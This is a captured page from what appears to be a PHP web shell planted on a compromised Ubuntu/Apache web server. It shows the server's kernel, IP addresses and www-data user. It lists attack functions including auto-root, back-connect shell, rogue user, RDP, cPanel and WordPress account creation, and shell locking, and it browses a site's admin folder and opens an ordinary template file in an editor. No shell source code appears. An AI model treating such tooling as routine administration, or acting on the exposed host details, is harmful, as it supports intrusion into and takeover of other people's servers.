Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.63.34
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
justhub /
assets /
admin /
php-version /
[ HOME SHELL ]
Name
Size
Permission
Action
blank.php
1.13
KB
-rw-r--r--
calendar.php
1.29
KB
-rw-r--r--
chart.php
7.04
KB
-rw-r--r--
config.php
46
B
-rw-r--r--
error.php
2.31
KB
-rw-r--r--
footer.php
4.59
KB
-rw-r--r--
form.php
11.51
KB
-rw-r--r--
gallery.php
2.09
KB
-rw-r--r--
grid.php
10.52
KB
-rw-r--r--
header.php
9.81
KB
-rw-r--r--
icon.php
20.17
KB
-rw-r--r--
index.php
21.29
KB
-rw-r--r--
login.php
1.71
KB
-rw-r--r--
table.php
49.77
KB
-rw-r--r--
tour.php
1.47
KB
-rw-r--r--
typography.php
10
KB
-rw-r--r--
ui.php
18.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : blank.php
<?php include('header.php'); ?> <div> <ul class="breadcrumb"> <li> <a href="#">Home</a> </li> <li> <a href="#">Blank</a> </li> </ul> </div> <div class="row"> <div class="box col-md-12"> <div class="box-inner"> <div class="box-header well" data-original-title=""> <h2><i class="glyphicon glyphicon-star-empty"></i> Blank</h2> <div class="box-icon"> <a href="#" class="btn btn-setting btn-round btn-default"><i class="glyphicon glyphicon-cog"></i></a> <a href="#" class="btn btn-minimize btn-round btn-default"><i class="glyphicon glyphicon-chevron-up"></i></a> <a href="#" class="btn btn-close btn-round btn-default"><i class="glyphicon glyphicon-remove"></i></a> </div> </div> <div class="box-content"> <!-- put your content here --> </div> </div> </div> </div><!--/row--> <?php include('footer.php'); ?>
Close